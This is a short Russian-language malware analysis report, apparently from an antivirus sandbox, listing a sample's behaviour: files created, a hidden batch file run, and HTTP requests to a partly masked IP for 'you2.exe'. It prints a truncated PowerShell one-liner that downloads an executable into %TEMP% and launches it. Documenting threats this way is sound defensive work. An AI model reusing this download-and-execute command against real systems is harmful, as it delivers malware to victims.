Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $mbxku как %temp%\xzbzupsoox3.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function cejclbut8([String] $Mbxku){(New-Object System.Net.WebClient).DownloadFile($Mbxku,''%TEMP%\xzbzupsoox3.exe'');Start-Process ''%TEMP%\xzbzupsoox3.exe'';}try{...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1384
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\sfyraaxyy4.bat
- %TEMP%\722253.cvr
Сетевая активность
Подключается к
- '5.##9.255.4':80
TCP
Запросы HTTP GET
- http://5.##9.255.4/you2.exe
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Sfyraaxyy4.bat" " (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function cejclbut8([String] $Mbxku){(New-Object System.Net.WebClient).DownloadFile($Mbxku,''%TEMP%\xzbzupsoox3.exe'');Start-Process ''%TEMP%\xzbzupsoox3.exe'';}try{... (со скрытым окном)
